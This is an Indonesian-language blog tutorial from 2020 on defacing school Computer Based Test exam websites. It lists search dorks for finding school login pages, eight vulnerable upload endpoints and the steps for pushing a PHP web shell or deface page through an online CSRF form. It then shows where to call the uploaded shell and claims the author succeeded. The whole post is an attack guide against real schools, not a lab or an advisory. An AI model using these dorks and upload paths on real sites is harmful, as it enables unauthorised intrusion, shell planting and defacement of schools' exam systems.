Saturday, April 11, 2020
Assalamualaikum Wr.Wb Brother:D
Yoi guys, kembali lagi bersama saya #Sky_ID brooo:D
Di blog kali ini saya akan memberikan tutorial deface CBT atau Computer Based Test
Oke guys lgsg ke bahan-bahannya saja
-Dork
Kalian bisa menggunakan dork ini:
inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart
Selebihnya kalian bisa kembangin menggunakan otak:D
Exploit:
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload-file.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
-CSRF ONLINE
Kalian bisa menggunakan csrf ini : KLIK HERE!
Pertama, kita dorking dlu
Pilih salah satu target
Nahh,klo udh mendapatkan target, lalu kita tambahkan exploitnya
Contoh: http://cbt. site.sch.id/panel/pages/upload-file.php
Kalau udah di tambahin exploitnya, dan web nya blank putih, brarti web nya vuln cbt
Selanjutnya kita copy web nya, lalu paste di csrf
Kalian kunci targetnya, kalian pilih post file nya: uploadfile , lalu up shell(jika web nya support)
Kalau web nya tdk support up shell kita upload html saja/sc deface
Jika sudah di up file, cara memanggil nya gini:
/images/namashell.php
/videos/namashell.php
pictures/namashell.php
And boom!!
Dsni saya berhasil upload shell
Oke sekian tutorial dari saya #Sky_ID
Terima kasih
Wassalamualaikum Wr.Wb